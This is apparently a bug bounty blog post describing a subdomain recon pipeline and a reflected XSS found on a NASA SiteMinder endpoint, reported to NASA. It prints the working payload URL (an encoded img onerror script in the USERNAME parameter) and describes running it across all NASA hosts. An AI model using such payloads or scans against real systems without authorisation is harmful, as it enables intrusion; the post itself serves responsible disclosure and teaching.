How I Found a Reflected XSS at NASA

Jh0n_0x
4 min readFeb 12, 2024

Hello friends, this is my first article in the security area, I will post here for you some of my experiences with bug bounty on how I found certain security flaws in web applications and I will also be posting some research, tips and suggestions, I hope you like it. Forgive me for any spelling errors :).

In this first article I will be explaining how I found a Reflected XSS on a NASA subdomain, I received some messages from some people asking me how I did it, what the process was, etc… so as I was already thinking about starting to post articles, I thought I would join the useful to the pleasant.

Finding the flaw was a relatively simple process, I honestly don’t like saying that because sometimes it can send the wrong message to readers, after all, for those just starting out, the idea of other professional hackers finding flaws in a simple way and him not being able to do it this can be distressing, and even disappointing, which is why I like to say that the important thing is to know your process, understand the application and think differently. It may sound cliché, but believe me, this is the most functional way possible.

I generally like to look for faults more manually, but I also use some tools to automate repetitive processes that don’t need my full attention, and that allow me more time to test other parameters.

So I created a basic script to collect nasa subdomains, it basically uses subfinder, amass, findomain, CRT, after collecting the subdomains the script removes the duplicates and performs a new check on these subdomains found, that is, a collecting subdomains on top of subdomains. If you are a beginner this may seem strange, but I will explain it to you, generally the tools subfinder, findomain and etc… use a database of collections linked to a specific domain or subdomain, for example: google.com, it would return: test.google.com, test1.google.com, test2.google.com and so on. But when we use the subdomain to check within these tools, it can find, for example, helloworld.test.google.com, a more in-depth subdomain, hidden from the simple conventional tests that other researchers might think of.

So after this complete collection of subdomains, the script checks which of these hosts are active, using httpx, I particularly like httpx, as it allows me to do some additional checks, such as returning the page title, the status code , the technologies being used, whether it is being redirected and where, and even testing web services on other ports. This type of information is very useful for me, as it allows me to have a general base of my target and helps me to have a guide on where to start attacking. I recommend reading their documentation and parameterizing however you prefer: https://docs.projectdiscovery.io/tools/httpx/overview.

Now that we have the hosts that are active, I check the open ports on each of these hosts, I like to use naabu to check the open ports, and I use the -nmap-cli parameter, to be able to use nmap for some more detailed information about the service that is running, such as versioning, use of basic Lua scripts, and so on.

With this information gathered, my script separates into a file the active hosts that are running web services on whatever port it is running on. So I make a crawler using both passive and active information, using gauplus or gau, waybackurls, katana, ParamSpider, linkfinder and separate everything using tomnonom’s excellent tool, GF: https://github.com/tomnomnom/gf. With it I can separate the endpoints by possible vulnerabilities for later testing.

And finally, my script runs the nucleus, using the updated templates and also some additional templates, to check whether the web application has any known vulnerabilities and a CVE has already been registered.

And so using the nuclei we found an xss in a nasa subdomain

sub.sub.nasa.gov/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=7&USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\ u003e. 

And of course, as a good scout, just out of conscience, using the meg tool, I took this endpoint and ran it on all nasa subdomains and IPs, hoping to find another web application with the same vulnerability, but without success.

So I reported the vulnerability, which was properly handled by the NASA security team.

I hope you liked it, I’m open to suggestions or to ask questions, call me on Twitter https://twitter.com/Jh0n_0x and I’ll respond to everyone, leave your thumbs up to help with more content like this and better content to come.

Thanks, until next time.

--

--

Jh0n_0x

Ethical hacker 🇧🇷 pentester 👨🏽‍💻 bughunter 🔥